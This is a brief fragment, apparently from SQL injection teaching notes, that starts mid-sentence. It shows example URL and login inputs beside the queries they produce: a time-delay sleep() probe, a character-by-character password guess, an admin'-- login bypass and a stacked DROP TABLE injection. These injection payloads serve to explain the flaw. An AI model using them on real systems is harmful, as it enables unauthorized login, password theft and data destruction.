WHERE id=3 • news.php?id=sleep(123) – SELECT * FROM news WHERE id=sleep(123) • news.php?id=3 and left(pwd, 1)='a' – SELECT * FROM news WHERE id=3 and left(pwd, 1)='a'
SELECT * FROM user WHERE name='admin' and pwd= '123456' • login.asp # admin'-- – SELECT * FROM user WHERE name='admin'--' and …… • login.asp # admin';DROP table ... – SELECT * FROM user WHERE name='admin';DROP table user;--' and ……